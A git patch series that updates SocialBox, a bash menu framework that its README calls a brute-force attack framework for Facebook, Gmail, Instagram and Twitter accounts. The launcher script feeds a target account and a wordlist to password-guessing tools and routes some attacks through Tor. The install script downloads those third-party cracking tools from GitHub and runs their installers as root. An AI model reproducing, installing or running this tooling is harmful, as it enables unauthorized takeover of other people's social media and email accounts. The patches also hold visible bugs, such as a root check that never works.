From 398c752bffb9725841d02a4d180537d18a7f6f47 Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:18:18 +0430 Subject: [PATCH 1/6] Delete SocialBox.sh --- SocialBox.sh | 154 --------------------------------------------------- 1 file changed, 154 deletions(-) delete mode 100644 SocialBox.sh diff --git a/SocialBox.sh b/SocialBox.sh deleted file mode 100644 index 6c2016b..0000000 --- a/SocialBox.sh +++ /dev/null @@ -1,154 +0,0 @@ -#!/bin/bash -#Colors -white="\033[1;37m" -grey="\033[0;37m" -purple="\033[0;35m" -red="\033[1;31m" -green="\033[1;32m" -yellow="\033[1;33m" -Purple="\033[0;35m" -Cyan="\033[0;36m" -Cafe="\033[0;33m" -Fiuscha="\033[0;35m" -blue="\033[1;34m" -nc="\e[0m" -#ROOT PRIVILEGIES -if [[ $EUID -ne 0 ]]; then - echo -e "$red You don't have Root privilegies, execute the script as root.$nc" - exit 1 -fi -#Installation -sleep 1 -echo -e "Checking Installation $nc" -bash install-sb.sh -echo -e "Checking Completed [$green✓$nc] $nc " -sleep 1 -clear -#Startup -echo -e "$green" -echo " .▄▄ · ▄▄· ▪ ▄▄▄· ▄▄▌ ▄▄▄▄· ▐▄• ▄ " -echo " ▐█ ▀. ▪ ▐█ ▌▪██ ▐█ ▀█ ██• ▐█ ▀█▪▪ █▌█▌▪" -echo " ▄▀▀▀█▄ ▄█▀▄ ██ ▄▄▐█·▄█▀▀█ ██▪ ▐█▀▀█▄ ▄█▀▄ ·██· " -echo " ▐█▄▪▐█▐█▌.▐▌▐███▌▐█▌▐█ ▪▐▌▐█▌▐▌ ██▄▪▐█▐█▌.▐▌▪▐█·█▌" -echo -e " ▀▀▀▀ ▀█▄▀▪·▀▀▀ ▀▀▀ ▀ ▀ .▀▀▀ ·▀▀▀▀ ▀█▄▀▪•▀▀ ▀▀$nc $blue v1$nc" -echo -e " [+] $red Coded By Belahsan Ouerghi$nc [+]" -echo -e " [+] $red www.facebook.com/ouerghi.belahsan$nc [+]" -echo -e " [+] $red Greetz To All Pentesters$nc [+]" -echo -e " [+]$red Special Greetz To$nc :$green {thelinuxchoice , Ha3MrX, Tunisian Eagles}$nc [+]" -echo "" -echo -e "$yellow Select From Menu : $nc" -echo "" -echo -e " $Cyan 1 : Brute Force Facebook Account$nc" -echo -e " $Cyan 2 : Brute Force Gmail Account$nc" -echo -e " $Cyan 3 : Brute Force Instagram Account$nc" -echo -e " $Cyan 4 : Brute Force Twitter Account$nc" -echo -e " $Cyan 99: Exit$nc" -read -p "Choice > " ch -if [ $ch = 1 ]; then -echo -e " $Cyan Facebook Brute Force$nc" -echo -e "$green" -read -p "Enter Facebook ID / Email / Username / Number: " id -read -p "Enter wordlist path : " wordlist -echo -e "$nc" -cd facebook -perl fb-brute.pl $id $wordlist -echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" -echo -e "$red" -read -p "Wanna Back To Main Menu [ Y / n ] : " check -echo -e "$nc" -if [ $check = "Y" ]; then -cd .. && bash SocialBox.sh -elif [ $check = "y" ]; then -cd .. && bash SocialBox.sh -elif [ $check = "Yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check = "yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check = "YES" ]; then -cd .. && bash SocialBox.sh -else -exit 1 -fi -elif [ $ch = 2 ]; then -echo -e " $Cyan Gmail Brute Force$nc" -cd Gemail-Hack -python gemailhack.py -echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" -echo -e "$red" -read -p "Wanna Back To Main Menu [ Y / n ] : " check2 -echo -e "$nc" -if [ $check2 = "Y" ]; then -cd .. && bash SocialBox.sh -elif [ $check2 = "y" ]; then -cd .. && bash SocialBox.sh -elif [ $check2 = "Yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check2 = "yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check2 = "YES" ]; then -cd .. && bash SocialBox.sh -else -exit 1 -fi -elif [ $ch = 3 ]; then -echo -e " $Cyan Instagram Brute Force$nc" -cd instainsane/ -sleep 0.025 - echo -e " [+]$red Service Tor Stated $nc[+]" -sleep 0.9 -service tor start -./instainsane.sh -echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" -service tor stop -echo -e " [+]$red Service Tor Stopped$nc [+]" -echo -e "$red" -read -p "Wanna Back To Main Menu [ Y / n ] : " check3 -echo -e "$nc" -if [ $check3 = "Y" ]; then -cd .. && bash SocialBox.sh -elif [ $check3 = "y" ]; then -cd .. && bash SocialBox.sh -elif [ $check3 = "Yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check3 = "yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check3 = "YES" ]; then -cd .. && bash SocialBox.sh -else -exit 1 -fi -elif [ $ch = 4 ]; then -echo -e " $Cyan Twitter Brute Force$nc" -cd tweetshell/ -sleep 0.025 - echo -e " [+]$red Service Tor Stated $nc[+]" -sleep 0.9 -service tor start -bash tweetshell.sh -echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" -service tor stop -echo -e " [+]$red Service Tor Stopped$nc [+]" -echo -e "$red" -read -p "Wanna Back To Main Menu [ Y / n ] : " check4 -echo -e "$nc" -if [ $check4 = "Y" ]; then -cd .. && bash SocialBox.sh -elif [ $check4 = "y" ]; then -cd .. && bash SocialBox.sh -elif [ $check4 = "Yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check4 = "yes" ]; then -cd .. && bash SocialBox.sh -elif [ $check4 = "YES" ]; then -cd .. && bash SocialBox.sh -else -exit 1 -fi -elif [ $ch == 99 ]; then -echo -e "$red Program Exit ...$nc" -sleep 0.25 -exit 1 -else -echo "Not Found 404 , Exit" -exit 1 -fi From 2cf069e4dbdf90adc53492ff684fe6c9549e9e4e Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:19:17 +0430 Subject: [PATCH 2/6] SocialBox update SocialBox.sh --- SocialBox.sh | 153 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 153 insertions(+) create mode 100644 SocialBox.sh diff --git a/SocialBox.sh b/SocialBox.sh new file mode 100644 index 0000000..07c7c81 --- /dev/null +++ b/SocialBox.sh @@ -0,0 +1,153 @@ +#!/urs/bin/env bash + +#Colors +white="\033[1;37m" +grey="\033[0;37m" +purple="\033[0;35m" +red="\033[1;31m" +green="\033[1;32m" +yellow="\033[1;33m" +Purple="\033[0;35m" +Cyan="\033[0;36m" +Cafe="\033[0;33m" +Fiuscha="\033[0;35m" +blue="\033[1;34m" +nc="\e[0m" + +if [[ "(id -u)" -ne 0 ]]; then + echo "Please, Run This Programm as Root! + " + exit 1 +fi +sleep 1 +printf '\033]2;Soial Box\a' +clear +#Startup +echo -e "$green" +echo " .▄▄ · ▄▄· ▪ ▄▄▄· ▄▄▌ ▄▄▄▄· ▐▄• ▄ " +echo " ▐█ ▀. ▪ ▐█ ▌▪██ ▐█ ▀█ ██• ▐█ ▀█▪▪ █▌█▌▪" +echo " ▄▀▀▀█▄ ▄█▀▄ ██ ▄▄▐█·▄█▀▀█ ██▪ ▐█▀▀█▄ ▄█▀▄ ·██· " +echo " ▐█▄▪▐█▐█▌.▐▌▐███▌▐█▌▐█ ▪▐▌▐█▌▐▌ ██▄▪▐█▐█▌.▐▌▪▐█·█▌" +echo -e " ▀▀▀▀ ▀█▄▀▪·▀▀▀ ▀▀▀ ▀ ▀ .▀▀▀ ·▀▀▀▀ ▀█▄▀▪•▀▀ ▀▀$nc $blue v1.3$nc" +echo -e " [+] $red Coded By Belahsan Ouerghi$nc [+]" +echo -e " [+] $red www.facebook.com/ouerghi.belahsan$nc [+]" +echo -e " [+] $red Greetz To All Pentesters$nc [+]" +echo -e " [+]$red Special Greetz To$nc :$green {thelinuxchoice , Ha3MrX, Tunisian Eagles}$nc [+]" +echo "" +echo -e "$yellow Select From Menu : $nc" +echo "" +echo -e " $Cyan 1 : Brute Force Facebook Account$nc" +echo -e " $Cyan 2 : Brute Force Gmail Account$nc" +echo -e " $Cyan 3 : Brute Force Instagram Account$nc" +echo -e " $Cyan 4 : Brute Force Twitter Account$nc" +echo -e " $Cyan 99: Exit$nc" +read -p "Choice > " ch +if [ $ch = 1 ]; then + echo -e " $Cyan Facebook Brute Force$nc" + echo -e "$green" + read -p "Enter Facebook ID / Email / Username / Number: " id + read -p "Enter wordlist path : " wordlist + echo -e "$nc" + cd facebook + perl fb-brute.pl $id $wordlist + echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" + echo -e "$red" + read -p "Wanna Back To Main Menu [ Y / n ] : " check + echo -e "$nc" +if [ $check = "Y" ]; then + cd .. && bash SocialBox.sh +elif [ $check = "y" ]; then + cd .. && bash SocialBox.sh +elif [ $check = "Yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check = "yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check = "YES" ]; then + cd .. && bash SocialBox.sh +else + exit 1 +fi +elif [ $ch = 2 ]; then + echo -e " $Cyan Gmail Brute Force$nc" + cd Gemail-Hack + python gemailhack.py + echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" + echo -e "$red" + read -p "Wanna Back To Main Menu [ Y / n ] : " check2 + echo -e "$nc" +if [ $check2 = "Y" ]; then + cd .. && bash SocialBox.sh +elif [ $check2 = "y" ]; then + cd .. && bash SocialBox.sh +elif [ $check2 = "Yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check2 = "yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check2 = "YES" ]; then + cd .. && bash SocialBox.sh +else + exit 1 +fi +elif [ $ch = 3 ]; then + echo -e " $Cyan Instagram Brute Force$nc" + cd instainsane/ + sleep 0.025 + echo -e " [+]$red Service Tor Stated $nc[+]" + sleep 0.9 + service tor start + ./instainsane.sh + echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" + service tor stop + echo -e " [+]$red Service Tor Stopped$nc [+]" + echo -e "$red" + read -p "Wanna Back To Main Menu [ Y / n ] : " check3 + echo -e "$nc" +if [ $check3 = "Y" ]; then + cd .. && bash SocialBox.sh + elif [ $check3 = "y" ]; then + cd .. && bash SocialBox.sh + elif [ $check3 = "Yes" ]; then + cd .. && bash SocialBox.sh + elif [ $check3 = "yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check3 = "YES" ]; then + cd .. && bash SocialBox.sh + else + exit 1 +fi +elif [ $ch = 4 ]; then + echo -e " $Cyan Twitter Brute Force$nc" + cd tweetshell/ + sleep 0.025 + echo -e " [+]$red Service Tor Stated $nc[+]" + sleep 0.9 + service tor start + bash tweetshell.sh + echo -e " [+]$yellow Brute Force Complete $nc[$green✓$nc] $nc[+]" + service tor stop + echo -e " [+]$red Service Tor Stopped$nc [+]" + echo -e "$red" + read -p "Wanna Back To Main Menu [ Y / n ] : " check4 + echo -e "$nc" +if [ $check4 = "Y" ]; then + cd .. && bash SocialBox.sh +elif [ $check4 = "y" ]; then + cd .. && bash SocialBox.sh +elif [ $check4 = "Yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check4 = "yes" ]; then + cd .. && bash SocialBox.sh +elif [ $check4 = "YES" ]; then + cd .. && bash SocialBox.sh +else + exit 1 +fi +elif [ $ch == 99 ]; then + echo -e " + $red Program Exit ...$nc" + sleep 0.25 + exit 1 +else + echo "Not Found 404 , Exit" + exit 1 +fi From ed26e842aa723ffbe0548742d71ceadf5dd99905 Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:22:19 +0430 Subject: [PATCH 3/6] Delete install-sb.sh --- install-sb.sh | 31 ------------------------------- 1 file changed, 31 deletions(-) delete mode 100644 install-sb.sh diff --git a/install-sb.sh b/install-sb.sh deleted file mode 100644 index 85ef560..0000000 --- a/install-sb.sh +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash -#Sysupdate -sudo apt-get update -#Python -sudo apt-get install python -#gmail -git clone https://github.com/Ha3MrX/Gemail-Hack.git -#facebook -if [ -d facebook ]; then - echo "Directory facebook exists.[✔]" -else - mkdir facebook - cd facebook - wget raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl - cd .. -fi -#Instagram -git clone https://github.com/thelinuxchoice/instainsane.git -cd instainsane -chmod +x instainsane.sh -chmod +x install.sh -sudo ./install.sh -cd .. -#Twitter -git clone https://github.com/thelinuxchoice/tweetshell.git -cd tweetshell -chmod +x tweetshell.sh -chmod +x install.sh -sudo ./install.sh -cd .. - From 5dcf3a5de5393ffe398ab524fde819dc91d200c8 Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:22:55 +0430 Subject: [PATCH 4/6] Installing Update install-sb.sh --- install-sb.sh | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 install-sb.sh diff --git a/install-sb.sh b/install-sb.sh new file mode 100644 index 0000000..64772b3 --- /dev/null +++ b/install-sb.sh @@ -0,0 +1,34 @@ +#!/usr/bin/env bash + +if [[ "$(id -u)" -ne 0 ]]; then + echo " +Please, Run This Programm as Root!" + exit 1 +fi +main() { + apt-get update + apt install python + apt install python3 + git clone https://github.com/Ha3MrX/Gemail-Hack.git + if [ -d facebook ]; then + echo "Directory facebook exists.[✔]" + else + mkdir facebook + cd facebook + wget raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl + cd .. + fi + git clone https://github.com/thelinuxchoice/instainsane.git + cd instainsane + chmod +x instainsane.sh + chmod +x install.sh + sudo ./install.sh + cd .. + git clone https://github.com/thelinuxchoice/tweetshell.git + cd tweetshell + chmod +x tweetshell.sh + chmod +x install.sh + sudo ./install.sh + cd .. +} +main \ No newline at end of file From 2ce1739d8e20eb584b4df598b649c6033d1b45e3 Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:28:23 +0430 Subject: [PATCH 5/6] Update README.md --- README.md | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index bf3523d..9fe4423 100644 --- a/README.md +++ b/README.md @@ -2,22 +2,27 @@ SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi # Installation ``` -sudo apt-get install git +sudo apt install git + git clone https://github.com/TunisianEagles/SocialBox.git + cd SocialBox -chmod +x SocialBox.sh -chmod +x install-sb.sh + ./install-sb.sh + ./SocialBox.sh ``` # Screenshots : ![Test Image 8](https://raw.githubusercontent.com/TunisianEagles/SocialBox/master/Screenshots/sb.png) + # Tested On : * Backbox linux * Ubuntu * Kali linux + # Contact * [Contact](https://www.facebook.com/ouerghi.belahsan) - Belahsan Ouerghi + # Authors : * facebook : Imad * gmail : Ha3MrX From 9785e6b6116400add23576cd64e4ea2f40763fcb Mon Sep 17 00:00:00 2001 From: "Mr.nope" <78996423+mrprogrammer2938@users.noreply.github.com> Date: Fri, 23 Jul 2021 09:29:07 +0430 Subject: [PATCH 6/6] Update install-sb.sh Update File: install-sb.sh --- install-sb.sh | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/install-sb.sh b/install-sb.sh index 64772b3..280fece 100644 --- a/install-sb.sh +++ b/install-sb.sh @@ -5,7 +5,8 @@ if [[ "$(id -u)" -ne 0 ]]; then Please, Run This Programm as Root!" exit 1 fi -main() { +main() { + chmod +x SocialBox.sh apt-get update apt install python apt install python3 @@ -31,4 +32,4 @@ main() { sudo ./install.sh cd .. } -main \ No newline at end of file +main